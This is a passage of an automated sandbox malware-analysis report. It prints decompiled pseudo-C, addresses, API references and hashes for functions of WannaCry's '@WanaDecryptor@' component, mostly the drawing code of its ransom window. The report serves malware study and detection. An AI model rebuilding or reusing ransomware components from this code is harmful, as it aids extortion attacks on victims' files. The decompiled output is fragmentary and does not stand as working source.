									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                  0x004090f6
                                  0x004090f8
                                  0x004090fd
                                  0x004090fe
                                  0x00409105
                                  0x0040910c
                                  0x00409115
                                  0x0040911c
                                  0x0040911e
                                  0x0040971e
                                  0x00409729
                                  0x00409736
                                  0x00409736
                                  0x00409124
                                  0x0040912f
                                  0x00409133
                                  0x00409137
                                  0x00409142
                                  0x00409143
                                  0x0040914a
                                  0x00409152
                                  0x0040915c
                                  0x0040918c
                                  0x0040918e
                                  0x00409197
                                  0x00409197
                                  0x0040919c
                                  0x004091a7
                                  0x004091ad
                                  0x004091b1
                                  0x004091bb
                                  0x004091bf
                                  0x004091c4
                                  0x0040915e
                                  0x00409163
                                  0x0040916c
                                  0x0040916e
                                  0x00409177
                                  0x00409177
                                  0x0040917f
                                  0x0040917f
                                  0x00409163
                                  0x004091c8
                                  0x004091cf
                                  0x0040970a
                                  0x0040970e
                                  0x00409719
                                  0x00000000
                                  0x004091d5
                                  0x004091dd
                                  0x004091e4
                                  0x004091e9
                                  0x004091eb
                                  0x004091ef
                                  0x004091fb
                                  0x00409203
                                  0x00409208
                                  0x00409215
                                  0x0040921d
                                  0x00409225
                                  0x0040922d
                                  0x00409235
                                  0x0040923e
                                  0x00409246
                                  0x0040924e
                                  0x00409256
                                  0x00409259
                                  0x00409260
                                  0x00409264
                                  0x0040926b
                                  0x0040926f
                                  0x00409277
                                  0x00409282
                                  0x0040928d
                                  0x00409292
                                  0x00409296
                                  0x0040929d
                                  0x004092a1
                                  0x004092a5
                                  0x004092ad
                                  0x004092b8
                                  0x004092c0
                                  0x004092c5
                                  0x004092c9
                                  0x004092d9
                                  0x004092e1
                                  0x004092f3
                                  0x004092f7
                                  0x004092fb
                                  0x00409308
                                  0x0040930d
                                  0x0040930e
                                  0x0040930f
                                  0x00409317
                                  0x0040931c
                                  0x0040931f
                                  0x00409323
                                  0x00409327
                                  0x00409337
                                  0x00409355
                                  0x00409357
                                  0x00409357
                                  0x0040935b
                                  0x0040935f
                                  0x00409363
                                  0x0040936f
                                  0x0040937b
                                  0x00409381
                                  0x00409389
                                  0x004093a4
                                  0x004093bd
                                  0x004093de
                                  0x00000000
                                  0x00000000
                                  0x004093e0
                                  0x004093e8
                                  0x004093ec
                                  0x004093f0
                                  0x004093f2
                                  0x004093f2
                                  0x00000000
                                  0x004093f2
                                  0x004093bf
                                  0x004093c7
                                  0x004093cb
                                  0x004093cf
                                  0x004093d3
                                  0x00000000
                                  0x004093d3
                                  0x004093a6
                                  0x004093ae
                                  0x004093b2
                                  0x00000000
                                  0x0040938b
                                  0x0040938f
                                  0x00409393
                                  0x00409397
                                  0x0040939b
                                  0x004093f6
                                  0x004093ff
                                  0x0040940b
                                  0x004094b9
                                  0x004094cc
                                  0x004094d5
                                  0x004094e8
                                  0x004094f3
                                  0x00409517
                                  0x00409525
                                  0x00409537
                                  0x00409537
                                  0x0040953d
                                  0x00409553
                                  0x0040955d
                                  0x00409568
                                  0x0040956a
                                  0x0040956a
                                  0x0040956e
                                  0x00409572
                                  0x00409579
                                  0x00409580
                                  0x0040958e
                                  0x0040959b
                                  0x004095ad
                                  0x004095ad
                                  0x004095bf
                                  0x0040961a
                                  0x0040962d
                                  0x00409634
                                  0x0040963c
                                  0x00409641
                                  0x00409649
                                  0x0040964d
                                  0x00409658
                                  0x0040965a
                                  0x0040965d
                                  0x0040965d
                                  0x00409662
                                  0x0040966d
                                  0x00409671
                                  0x0040967b
                                  0x0040967d
                                  0x00409680
                                  0x00409680
                                  0x00409685
                                  0x0040968d
                                  0x00409691
                                  0x0040969c
                                  0x004096a3
                                  0x004096a3
                                  0x004096a6
                                  0x004096ae
                                  0x004096b2
                                  0x004096bc
                                  0x004096c5
                                  0x004096c5
                                  0x004096cc
                                  0x004096d4
                                  0x004096d9
                                  0x004096dd
                                  0x004096e5
                                  0x004096ed
                                  0x004096f5
                                  0x004096fa
                                  0x00409702
                                  0x00000000
                                  0x004095c1
                                  0x004095c9
                                  0x004095d1
                                  0x004095d3
                                  0x004095d3
                                  0x004095e0
                                  0x004095eb
                                  0x004095ef
                                  0x004095fc
                                  0x00409604
                                  0x00409608
                                  0x0040960a
                                  0x0040960b
                                  0x0040960c
                                  0x00409610
                                  0x00409614
                                  0x00000000
                                  0x00409614
                                  0x004095bf
                                  0x0040950c
                                  0x00000000
                                  0x0040950c
                                  0x00409421
                                  0x0040942c
                                  0x00409430
                                  0x00409432
                                  0x00409432
                                  0x00409444
                                  0x00000000
                                  0x0040944a
                                  0x0040945c
                                  0x0040945f
                                  0x00409467
                                  0x00409478
                                  0x0040948e
                                  0x00409491
                                  0x0040949b
                                  0x0040949c
                                  0x004094a3
                                  0x00000000
                                  0x004094a3
                                  0x00409444
                                  0x00409389

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                  0x00405236
                                  0x00405238
                                  0x0040523d
                                  0x0040523e
                                  0x0040524b
                                  0x0040524e
                                  0x00405254
                                  0x00405369
                                  0x00405552
                                  0x0040555a
                                  0x00405560
                                  0x00405568
                                  0x00405572
                                  0x00405572
                                  0x0040536f
                                  0x00405373
                                  0x0040539e
                                  0x0040539e
                                  0x004053a1
                                  0x004053a4
                                  0x00405430
                                  0x00405433
                                  0x004054b4
                                  0x004054b6
                                  0x00405503
                                  0x00405506
                                  0x00000000
                                  0x00000000
                                  0x0040550b
                                  0x0040550e
                                  0x00405511
                                  0x00405516
                                  0x00405517
                                  0x00405519
                                  0x0040551b
                                  0x00000000
                                  0x00000000
                                  0x0040551d
                                  0x0040551f
                                  0x00000000
                                  0x00000000
                                  0x00405521
                                  0x00405523
                                  0x00405525
                                  0x00000000
                                  0x00000000
                                  0x00405527
                                  0x00405529
                                  0x00405534
                                  0x00405535
                                  0x00405536
                                  0x0040553e
                                  0x00405542
                                  0x00405545
                                  0x0040554a
                                  0x0040554d
                                  0x0040554f
                                  0x0040554f
                                  0x0040554f
                                  0x00000000
                                  0x00405529
                                  0x004054bb
                                  0x004054be
                                  0x004054c1
                                  0x004054c6
                                  0x004054c7
                                  0x004054c9
                                  0x004054cb
                                  0x004054d1
                                  0x004054d1
                                  0x004054d6
                                  0x004054d6
                                  0x004054d8
                                  0x004054da
                                  0x00000000
                                  0x00000000
                                  0x004054dc
                                  0x004054de
                                  0x004054e6
                                  0x004054e7
                                  0x004054ea
                                  0x004054ef
                                  0x004054f1
                                  0x004054f4
                                  0x004054f9
                                  0x004054fc
                                  0x004054fe
                                  0x004054fe
                                  0x004054fe
                                  0x00000000
                                  0x00405501
                                  0x004054cd
                                  0x004054cf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054cf
                                  0x0040543b
                                  0x0040543f
                                  0x00405440
                                  0x00405443
                                  0x0040544f
                                  0x00405450
                                  0x00405453
                                  0x0040545b
                                  0x00405468
                                  0x0040546b
                                  0x0040546c
                                  0x0040546d
                                  0x00405471
                                  0x00405476
                                  0x00405479
                                  0x0040547e
                                  0x00405487
                                  0x0040548b
                                  0x00405494
                                  0x00405499
                                  0x004054a2
                                  0x004054aa
                                  0x00000000
                                  0x004054aa
                                  0x004053b4
                                  0x004053b5
                                  0x004053b8
                                  0x004053c3
                                  0x004053d1
                                  0x004053d5
                                  0x004053d6
                                  0x004053d7
                                  0x004053dc
                                  0x004053dd
                                  0x004053e7
                                  0x004053e8
                                  0x004053e9
                                  0x004053ed
                                  0x004053f2
                                  0x004053f5
                                  0x004053fa
                                  0x00405403
                                  0x00405407
                                  0x00405410
                                  0x00405415
                                  0x0040541e
                                  0x00405426
                                  0x00000000
                                  0x00405426
                                  0x0040537b
                                  0x00405381
                                  0x00405384
                                  0x00405386
                                  0x00000000
                                  0x00000000
                                  0x00405388
                                  0x0040538a
                                  0x0040538c
                                  0x00000000
                                  0x00000000
                                  0x0040538e
                                  0x00405390
                                  0x00405393
                                  0x00405396
                                  0x0040539b
                                  0x0040539b
                                  0x0040539b
                                  0x00000000
                                  0x00405390
                                  0x0040525d
                                  0x00405285
                                  0x00405288
                                  0x0040528d
                                  0x004052f9
                                  0x004052fa
                                  0x004052fb
                                  0x004052fc
                                  0x00405303
                                  0x00405307
                                  0x00405309
                                  0x0040530c
                                  0x00405314
                                  0x00405319
                                  0x00405320
                                  0x00405321
                                  0x00405322
                                  0x00405326
                                  0x0040532b
                                  0x0040532e
                                  0x00405333
                                  0x0040533c
                                  0x00405340
                                  0x00405349
                                  0x0040534e
                                  0x00405357
                                  0x0040535f
                                  0x0040528f
                                  0x00405295
                                  0x00405297
                                  0x00405298
                                  0x0040529c
                                  0x004052a0
                                  0x004052a9
                                  0x004052b1
                                  0x004052b2
                                  0x004052b3
                                  0x004052b7
                                  0x004052b8
                                  0x004052bd
                                  0x004052c0
                                  0x004052c5
                                  0x004052ce
                                  0x004052d3
                                  0x004052dc
                                  0x004052e4
                                  0x004052e4
                                  0x00000000
                                  0x0040528d
                                  0x00405265
                                  0x00405268
                                  0x0040526d
                                  0x00000000
                                  0x00000000
                                  0x0040526f
                                  0x00405273
                                  0x00000000
                                  0x00000000
                                  0x00405275
                                  0x00405277
                                  0x0040527a
                                  0x0040527d
                                  0x00405282
                                  0x00405282
                                  0x00000000

                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
